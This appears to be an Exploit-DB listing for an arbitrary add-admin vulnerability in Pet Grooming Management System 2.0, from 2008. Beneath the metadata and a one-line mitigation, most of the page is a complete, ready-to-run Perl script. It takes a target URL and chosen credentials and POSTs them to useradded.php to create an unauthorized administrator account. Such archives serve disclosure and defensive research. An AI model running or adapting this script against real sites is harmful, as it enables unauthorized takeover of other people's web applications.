header-logo
Suggest Exploit
vendor:
Pet Grooming Management System
by:
t0pP8uZz
7.5
CVSS
HIGH
Arbitrary Add-Admin Exploit
264
CWE
Product Name: Pet Grooming Management System
Affected Version From: 2
Affected Version To: 2
Patch Exists: Yes
Related CWE: N/A
CPE: a:petgroom:pet_grooming_management_system
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Pet Grooming Management System <= 2.0 Arbitrary Add-Admin Exploit

This exploit allows an attacker to add an admin user to the Pet Grooming Management System (PGMS) version 2.0. The attacker must provide a URL, username, and password to the script, which will then send a POST request to the useradded.php page with the provided credentials. If the request is successful, the attacker will be able to log in to the PGMS with the provided credentials.

Mitigation:

Upgrade to the latest version of PGMS, or apply the patch provided by the vendor.
Source

Exploit-DB raw data:

#!/usr/bin/perl

use strict;
use LWP::UserAgent;

print "-+- Pet Grooming Management System <= 2.0 Arbitrary Add-Admin Exploit -+-\n";
print "-+-  Discovered && Coded By: t0pP8uZz  -  Discovered On: 15 MAY 2008  -+-\n";
print "-+-  Script Download: http://sourceforge.net/projects/petgroom/       -+-\n";
print "-+- Pet Grooming Management System <= 2.0 Arbitrary Add-Admin Exploit -+-\n";

print "\nEnter URL(http://site.com/pet/): ";
	chomp(my $url=<STDIN>);
	
print "\nEnter Username(create your admin username): ";
	chomp(my $user=<STDIN>);
	
print "\nEnter Password(create your admin password): ";
	chomp(my $pass=<STDIN>);

my $ua = LWP::UserAgent->new( agent => 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)' );
my $ob = $ua->post($url."/useradded.php", { "name" => "admin", "user" => $user, "pwd" => $pass, "level" => 1, "centerstatus" => "a" } );

if($ob->is_success && index($ob->content, 10) != -1) {
	print "\n\nUser Added Successfully! Login to: $url\n";
} else { print "\n\nUser was not added. Username may be in use, or site isnt running PGMS.\n"; }

# milw0rm.com [2008-05-15]